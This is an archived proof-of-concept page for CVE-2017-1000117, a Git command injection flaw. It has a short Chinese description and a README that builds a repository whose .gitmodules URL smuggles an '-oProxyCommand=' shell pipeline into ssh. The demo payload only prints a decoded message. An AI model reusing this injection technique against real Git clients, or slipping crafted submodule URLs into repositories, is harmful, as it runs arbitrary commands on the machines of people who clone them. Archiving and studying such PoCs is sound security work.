Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2017-1000117 PoC — Git 命令注入漏洞

Source
Associated Vulnerability
Title:Git 命令注入漏洞 (CVE-2017-1000117)
Description:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git 2.7.5之前的版本中存在命令漏洞。远程攻击者可借助特制的‘ssh://...’URL利用该漏洞运行任意设备已退出的程序。
Readme
# CVE-2017-1000117

## How it works?
```
$ git clone --recursive git@github.com:ikmski/CVE-2017-1000117.git
```

## How to create this repository

```
$ cat message.txt | gzip | base64 > command


$ git submodule add git@github.com:ikmski/Hello-World.git subs/CVE-2017-1000117

$ cat << EOS > .gitmodules
[submodule "subs/CVE-2017-1000117"]
    path = subs/CVE-2017-1000117
    url = ssh://-oProxyCommand=cat command | base64 --decode | gzip -d >&2 /subs/CVE-2017-1000117
EOS

$ git submodule sync
$ git submodule update
```

File Snapshot

[4.0K] /data/pocs/b0a68d1ee0e339c20538bb0c8c301783c7db93b4 ├── [ 169] command ├── [ 189] message.txt ├── [ 526] README.md └── [4.0K] subs └── [4.0K] CVE-2017-1000117 2 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.